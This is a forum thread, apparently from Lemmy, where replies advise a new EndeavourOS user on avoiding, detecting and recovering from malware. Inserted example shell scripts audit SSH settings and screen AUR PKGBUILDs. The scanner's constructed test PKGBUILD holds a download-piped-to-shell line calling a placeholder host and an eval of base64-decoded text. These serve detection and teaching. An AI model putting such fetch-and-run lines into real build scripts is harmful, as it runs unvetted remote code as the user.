So I jumped from Windows to Linux (EndeavourOS, btw) and would like to know:

How do you keep your system clean? If you are infected, how do you find out? What do you do about it then?

  • CoyoteFacts@piefed.ca · 4 upvotes · edited · 9 hours ago

    I’m not a security expert by any means, but here are a few things I know as a regular user:

    Always keep your system up-to-date and only download and execute software from the official Arch repository if you can help it. Malware often takes advantage of outdated systems that don’t have the latest security patches, so by staying as up-to-date as possible you’re making yourself a very difficult target. The AUR is a user-based repository and is not inherently trusted/maintained like the official Arch repos, so be careful and always read PKGBUILDs before you use AUR software. Don’t use AUR auto-updaters unless you’re reading the PKGBUILD changes every time. Ideally try not to use the AUR at all if you can help it; official Arch Linux is usually quite stable, but AUR software is often responsible for a lot of the “breakages” people tend to get with Arch. If you have to run sketchy software, use a virtual machine for it, as a 0-day VM escape is almost certainly not going to happen with any sort of malware you’d run into. ClamAV or VirusTotal may also help you scan specific files that you’re wary of, but I wouldn’t trust that a file is clean just because it passes an AV check. Also, never run anything as root unless you have a very specific reason, and even then try to use sudo instead of elevating to a full root shell.

    Don’t open up any network ports on your system unless you absolutely have to, and if you’re opening an SSH port, make sure that it isn’t on the default port number, that it requires a key file for login, that root cannot log in directly, and that authentication attempts are limited to a low number. If you’re opening ports for other services, try to use Docker/Podman containers with minimal access to your system resources and not running in root mode. Also consider using something like CrowdSec or fail2ban for blocking bots crawling ports.

    As far as finding out if you’re infected, I’m not sure if there’s a great way to know unless they immediately encrypt all your stuff and demand crypto. Malware could also come in the form of silent keyloggers (which you’d only find out about after you start getting your accounts hacked) or cryptocurrency miners/botnets (which probably attempt to hide their CPU/GPU usage while you’re actively using your computer). At the very least, you’re not likely to be hit by a sophisticated 0-day, so whatever malware you get on your computer probably wants something direct and uncomplicated from you.

    Setting up a backup solution to a NAS running e.g. ZFS can help with preventing malware from pwning your important data, as a filesystem like ZFS can rollback its snapshots and just unencrypt the data again (even if it’s encrypted directly on the NAS). 2FA’ing your accounts (especially important ones like email) is a good way to prevent keyloggers from being able to repeat your username+password into a service and get access. Setting up a resource monitoring daemon can probably help you find out if you’re leaking resources to some kind of crypto miner, though I don’t have specific recommendations as I haven’t done this before.

    In the case of what to do once you’re pwned, IMO the only real solution is to salvage and verify your data, wipe everything down, and reinstall. There’s no guarantee that the malware isn’t continually hiding itself somewhere, so trying to remove it yourself is probably not going to solve anything. If you follow all the above precautions and still get pwned, I’m fairly sure the malware will be news somewhere, and security experts may already be studying the malware’s behavior and giving tips on what to do as a resolution.
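The SSH checklist in the reply above (non-default port, key-only login, no direct root login, a low limit on authentication attempts), turned into a check you can run against an sshd_config file. This is an added example and not code from the thread: the function names sshd_get, lower_or and audit_sshd_config, the limit of 3 for MaxAuthTries, and the two sample configs are this example's own assumptions and constructions.

```shell
#!/bin/sh
# Added example, not from the thread: audit an sshd_config file against the four
# settings recommended above (non-default port, key-only login, no direct root
# login, low MaxAuthTries). Function names and the limit of 3 tries are this
# example's own assumptions; the two sample configs below are constructed.
#
# sshd takes the FIRST occurrence of a keyword, and "Match" blocks can override
# settings for specific users/hosts. This parser honours the first-wins rule and
# stops at the first Match block, reporting it for manual review.

# sshd_get FILE KEYWORD -> prints the effective value, or nothing if unset
sshd_get() {
    awk -v key="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" '
        /^[[:space:]]*#/ { next }            # comment line
        tolower($1) == "match" { exit }      # stop at the first Match block
        {
            line = $0
            sub(/^[[:space:]]+/, "", line)
            n = split(line, f, "[[:space:]=]+")   # "Key value" or "Key=value"
            if (n >= 2 && tolower(f[1]) == key) { print f[2]; exit }
        }' "$1"
}

# lower_or VALUE DEFAULT -> lower-cased VALUE, or DEFAULT when VALUE is empty
lower_or() {
    v=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
    printf '%s' "${v:-$2}"
}

# audit_sshd_config FILE -> one "WEAK:" line per problem; exit 0 only if none
audit_sshd_config() {
    file="$1"; weak=0

    port=$(sshd_get "$file" Port); port=${port:-22}
    if [ "$port" = "22" ]; then
        echo "WEAK: Port 22 (default); the post recommends a non-default port"
        weak=$((weak + 1))
    fi

    # key-only login means pubkey on AND both password-style paths off
    pubkey=$(lower_or "$(sshd_get "$file" PubkeyAuthentication)" yes)
    passwd=$(lower_or "$(sshd_get "$file" PasswordAuthentication)" yes)
    kbd=$(sshd_get "$file" KbdInteractiveAuthentication)
    if [ -z "$kbd" ]; then   # older releases spell it ChallengeResponseAuthentication
        kbd=$(sshd_get "$file" ChallengeResponseAuthentication)
    fi
    kbd=$(lower_or "$kbd" yes)
    if [ "$pubkey" != "yes" ] || [ "$passwd" != "no" ] || [ "$kbd" != "no" ]; then
        echo "WEAK: not key-only (Pubkey=$pubkey Password=$passwd KbdInteractive=$kbd)"
        weak=$((weak + 1))
    fi

    root=$(lower_or "$(sshd_get "$file" PermitRootLogin)" prohibit-password)
    if [ "$root" != "no" ]; then
        echo "WEAK: PermitRootLogin $root; should be 'no'"
        weak=$((weak + 1))
    fi

    tries=$(sshd_get "$file" MaxAuthTries); tries=${tries:-6}
    if [ "$tries" -gt 3 ]; then        # 3 is this example's assumed "low number"
        echo "WEAK: MaxAuthTries $tries; assumed limit is 3"
        weak=$((weak + 1))
    fi

    if grep -Eiq '^[[:space:]]*Match[[:space:]]' "$file"; then
        echo "NOTE: Match block present; its overrides are not evaluated here"
    fi
    [ "$weak" -eq 0 ]
}

# Constructed samples: a near-stock config and a hardened one.
SSHD_SAMPLES=$(mktemp -d)
WEAK_SSHD="$SSHD_SAMPLES/weak"; HARD_SSHD="$SSHD_SAMPLES/hard"
printf '%s\n' 'Port 22' '#PermitRootLogin prohibit-password' \
    'PasswordAuthentication yes' > "$WEAK_SSHD"
printf '%s\n' 'Port 2222' 'PubkeyAuthentication yes' 'PasswordAuthentication no' \
    'KbdInteractiveAuthentication no' 'PermitRootLogin no' 'MaxAuthTries 3' \
    'Match User backup' '    PasswordAuthentication yes' > "$HARD_SSHD"

for cfg in "$WEAK_SSHD" "$HARD_SSHD"; do
    echo "== $cfg"
    if audit_sshd_config "$cfg"; then echo "OK: matches the checklist"; fi
done
```

On a live system, `sshd -T` prints the effective configuration with all defaults resolved and is the authoritative check; the script above is for reading a config file offline, and it deliberately reports rather than interprets Match blocks, because a Match block can quietly turn password login back on for one user.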

  • wolf@lemmy.zip · 13 upvotes, 1 downvote · 10 hours ago

    Welcome to Linux.

    Concerning your questions:

    How to keep your system clean?

    • Subscribe to the security mailing list/blog etc. of your Linux distribution and of the software that you use
    • Update your system whenever there are updates available and reboot your system after applying the updates
    • Activate the firewall of your system and block all incoming traffic which was not initiated by your own system
    • Only install software which is distributed with your operating system or which is well known and you download from the official distribution page (for the sake of an example: if you use Google Chrome, download the package/binary for your Linux from Google's Chrome page)
    • Use an adblocker for your browser like uBlock Origin

    What not to do:

    • Never install software found on the internet or a forum
    • Never run arbitrary scripts from the internet in your shell

    Doing the above and applying some common sense should be fairly secure. As a rule of thumb: less software is always better, and well-known software will usually be better scrutinized and more secure. (YMMV)

    As a normal desktop user, your chances of getting your system infected when applying the above rules are very low, and they are your best line of defense.

    Securing a Linux system, especially in depth, fills books, and detecting an infection is another topic for specialists. One way to improve your chances of having a non-infected system is using an immutable Linux distribution like Fedora Silverblue, which should in theory be more resistant to infections and which should in theory allow you to detect infections easily.

    Unless you have a reason to expect being personally targeted (in which case: good luck to you ;-)), the answer to infections and similar is having regular full backups of all your data, so in case of an infection you can wipe your computer and recover everything. You should have regular full backups anyway, in case your SSD fails, your computer gets stolen and similar threats to your data.

  • Shatur@lemmy.ml · 5 upvotes, 1 downvote · 9 hours ago

    Welcome aboard!

    Never got a virus, or at least I don’t know about it 😅 But always install packages from official repositories or AUR (but I usually inspect PKGBUILDs for unpopular stuff).
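Both this reply and the first one say to read PKGBUILDs before building from the AUR. As an added example (not code from the thread or from any AUR package), here is a first-pass screen that points at the lines worth reading first; the patterns, the function names flag and pkgbuild_screen, and the two sample PKGBUILDs are constructed for illustration and are not real packages.

```shell
#!/bin/sh
# Added example, not from the thread: a first-pass screen for a PKGBUILD you are
# about to build from the AUR. It points at lines to read first; a clean result
# is NOT proof of safety. Patterns and both sample PKGBUILDs are constructed.

# flag MESSAGE -> record one finding
flag() { echo "FLAG: $1"; flags=$((flags + 1)); }

# pkgbuild_screen FILE -> one "FLAG:" line per hit; exit 0 only if none
pkgbuild_screen() {
    f="$1"; flags=0

    # 'SKIP' disables source verification; usual for VCS sources pinned by
    # #commit=, suspicious for tarballs, which should carry real checksums
    if grep -q "'SKIP'" "$f"; then
        flag "a checksum is SKIP: the source is not verified against the PKGBUILD"
    fi
    # plain http/ftp downloads can be tampered with in transit
    if grep -Eq '(http|ftp)://' "$f"; then
        flag "non-TLS URL (http:// or ftp://) present"
    fi
    # download piped straight into a shell: code that is never in the PKGBUILD
    if grep -Eq '(curl|wget)[^|]*\|[[:space:]]*(sh|bash)([[:space:]]|$)' "$f"; then
        flag "download piped into a shell"
    fi
    # packages must only write under $pkgdir; sudo means touching the live system
    if grep -Eq '(^|[[:space:];&|(])sudo[[:space:]]' "$f"; then
        flag "sudo used inside the PKGBUILD"
    fi
    # obfuscated or dynamically assembled code
    if grep -Eq 'base64[[:space:]]+(-d|--decode)|(^|[[:space:];])eval[[:space:]]' "$f"; then
        flag "base64 decoding or eval: read what it actually runs"
    fi
    # install scriptlets run as root at pacman time; they need reading too
    if grep -Eq '^[[:space:]]*install=' "$f"; then
        flag "install= scriptlet referenced; read that file as well"
    fi
    [ "$flags" -eq 0 ]
}

# Constructed samples. Neither is a real AUR package.
PKGBUILD_SAMPLES=$(mktemp -d)
SUSPECT_PKGBUILD="$PKGBUILD_SAMPLES/suspect"; CLEAN_PKGBUILD="$PKGBUILD_SAMPLES/clean"
cat > "$SUSPECT_PKGBUILD" <<'EOF'
# Maintainer: constructed sample
pkgname=example-tool
pkgver=1.0
pkgrel=1
arch=('x86_64')
url="http://example.invalid"
source=("http://example.invalid/example-tool-1.0.tar.gz")
sha256sums=('SKIP')
install=example-tool.install
build() {
  cd "$pkgname-$pkgver"
  curl -s http://example.invalid/setup.sh | sh
}
package() {
  eval "$(echo ZWNobyBoaQ== | base64 -d)"
  sudo cp example-tool /usr/bin/
}
EOF
cat > "$CLEAN_PKGBUILD" <<'EOF'
# Maintainer: constructed sample (placeholder checksum)
pkgname=example-tool
pkgver=1.0
pkgrel=1
arch=('x86_64')
url="https://example.invalid"
source=("https://example.invalid/example-tool-1.0.tar.gz")
sha256sums=('e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855')
build() {
  cd "$pkgname-$pkgver"
  make
}
package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
EOF

for p in "$SUSPECT_PKGBUILD" "$CLEAN_PKGBUILD"; do
    echo "== $p"
    if pkgbuild_screen "$p"; then echo "no flags (still read it)"; fi
done
```

The screen is deliberately pattern-based and noisy: a VCS package legitimately uses SKIP, and an install= scriptlet is normal for packages that need to refresh caches. Its job is to tell you where to look, not to replace reading the build() and package() functions and, for an update, diffing the new PKGBUILD against the one you last reviewed.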